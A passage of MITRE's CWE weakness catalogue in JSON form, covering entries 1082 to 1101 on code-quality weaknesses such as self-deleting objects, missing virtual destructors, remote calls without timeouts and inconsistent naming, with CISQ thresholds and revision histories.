ASCMM"},"Entry_ID":"ASCMM-MNT-8"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-8"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1082":{"attr":{"@_ID":"1082","@_Name":"Class Instance Self Destruction Control Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a class instance that calls the method or function to delete or destroy itself.","Extended_Description":{"xhtml:p":["For example, in C++, \\"delete this\\" will cause the object to delete itself.","This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-7"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-7"}},{"attr":{"@_External_Reference_ID":"REF-976"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1083":{"attr":{"@_ID":"1083","@_Name":"Data Access from Outside Expected Data Manager Component","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software is intended to manage data access through a particular data manager component such as a relational or non-SQL database, but it contains code that performs data access operations without using that component.","Extended_Description":{"xhtml:p":["When the software has a data access component, the design may be intended to handle all data access operations through that component.  If a data access operation is performed outside of that component, then this may indicate a violation of the intended design.","This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-10"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-10"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1084":{"attr":{"@_ID":"1084","@_Name":"Invokable Control Element with Excessive File or Data Access Operations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A function or method contains too many\\n\\t\\t\\t\\t\\toperations that utilize a data manager or file resource.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"too many operations\\" may vary for each product or developer, CISQ recommends a default maximum of 7 operations for the same data manager or file."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-14"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-14"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1085":{"attr":{"@_ID":"1085","@_Name":"Invokable Control Element with Excessive Volume of Commented-out Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A function, method, procedure, etc. contains an excessive amount of code that has been\\n\\t\\t\\t\\t\\tcommented out within its body.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"excessive volume\\" may vary for each product or developer, CISQ recommends a default threshold of 2% of commented code."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-6"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-6"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1086":{"attr":{"@_ID":"1086","@_Name":"Class with Excessive Number of Child Classes","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A class contains an unnecessarily large number of\\n\\t\\t\\t\\t\\tchildren.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"large number of children\\" may vary for each product or developer, CISQ recommends a default maximum of 10 child classes."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1093","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-18"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-18"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1087":{"attr":{"@_ID":"1087","@_Name":"Class with Virtual Method without a Virtual Destructor","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A class contains a virtual method, but the method does not have an associated virtual destructor.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably, e.g. due to undefined behavior.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-15"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-15"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1088":{"attr":{"@_ID":"1088","@_Name":"Synchronous Access of Remote Resource without Timeout","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code has a synchronous call to a remote resource, but there is no timeout for the call, or the timeout is set to infinite.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably, since an outage for the remote resource can cause the software to hang.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"821","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-19"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-19"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1089":{"attr":{"@_ID":"1089","@_Name":"Large Data Table with Excessive Number of Indices","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a large data table that contains an excessively large number of\\n\\t\\t\\t\\t\\tindices.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"large data table\\" and \\"excessively large number of indices\\" may vary for each product or developer, CISQ recommends a default threshold of 1000000 rows for a \\"large\\" table and a default threshold of 3 indices."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-6"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-6"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1090":{"attr":{"@_ID":"1090","@_Name":"Method Containing Access of a Member Element from Another Class","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A method for a class performs an operation that directly\\n\\t\\t\\t\\t\\taccesses a member element from another class.","Extended_Description":{"xhtml:p":"This issue suggests poor encapsulation and makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-16"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-16"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1091":{"attr":{"@_ID":"1091","@_Name":"Use of Object without Invoking Destructor Method","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a method that accesses an object but does not later invoke\\n\\t\\t\\t\\t\\tthe element\'s associated finalize/destructor method.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly by retaining memory and/or other resources longer than necessary.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"772","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-15"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-15"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1092":{"attr":{"@_ID":"1092","@_Name":"Use of Same Invokable Control Element in Multiple Architectural Layers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses the same control element across multiple\\n\\t\\t\\t\\t\\tarchitectural layers.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-10"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-10"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1093":{"attr":{"@_ID":"1093","@_Name":"Excessively Complex Data Representation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses an unnecessarily complex internal representation for its data structures or interrelationships between those structures.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Reduce Maintainability"},{"Scope":"Other","Impact":"Reduce Performance"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1094":{"attr":{"@_ID":"1094","@_Name":"Excessive Index Range Scan for a Data Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains an index range scan for a large data table,\\n\\t\\t\\t\\t\\tbut the scan can cover a large number of rows.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"large data table\\" and \\"excessive index range\\" may vary for each product or developer, CISQ recommends a threshold of 1000000 table rows and a threshold of 10 for the index range."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-7"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-7"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1095":{"attr":{"@_ID":"1095","@_Name":"Loop Condition Value Update within the Loop","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a loop with a control flow condition based on\\n\\t\\t\\t\\t\\ta value that is updated within the body of the loop.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-5"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-5"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1096":{"attr":{"@_ID":"1096","@_Name":"Singleton Class Instance Creation without Proper Locking or Synchronization","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software implements a Singleton design pattern but does not use appropriate locking or other synchronization mechanism to ensure that the singleton class is only instantiated once.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably, e.g. by making the instantiation process non-thread-safe and introducing deadlock (CWE-833) or livelock conditions.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"820","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-12"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-12"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"1097":{"attr":{"@_ID":"1097","@_Name":"Persistent Storable Data Element without Associated Comparison Control Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a storable data element that does not have\\n\\t\\t\\t\\t\\tall of the associated functions or methods that are necessary to support\\n\\t\\t\\t\\t\\tcomparison.","Extended_Description":{"xhtml:p":["For example, with Java, a class that is made persistent requires both hashCode() and equals() methods to be defined.","This issue can prevent the software from running reliably, due to incorrect or unexpected comparison results.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"595","@_View_ID":"1305","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-4"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-4"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1098":{"attr":{"@_ID":"1098","@_Name":"Data Element containing Pointer Item without Proper Copy Control Element","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a data element with a pointer that does not have an associated copy or constructor method.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-6"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-6"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1099":{"attr":{"@_ID":"1099","@_Name":"Inconsistent Naming Conventions for Identifiers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s code, documentation, or other artifacts do not\\n\\t\\t\\t\\t\\tconsistently use the same naming conventions for variables, callables, groups of\\n\\t\\t\\t\\t\\trelated callables, I/O capabilities, data types, file names, or similar types of\\n\\t\\t\\t\\t\\telements.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and/or maintain the software due to inconsistencies, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1100":{"attr":{"@_ID":"1100","@_Name":"Insufficient Isolation of System-Dependent Functions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product or code does not isolate system-dependent\\n\\t\\t\\t\\t\\tfunctionality into separate standalone modules.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain and/or port the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1101":{"attr":{"@_ID":"1101","@_Name":"Reliance on Runtime Component in Generated Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses automatically-generated code that cannot be\\n\\t\\t\\t\\t\\texecuted without a specific runtime support component.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce 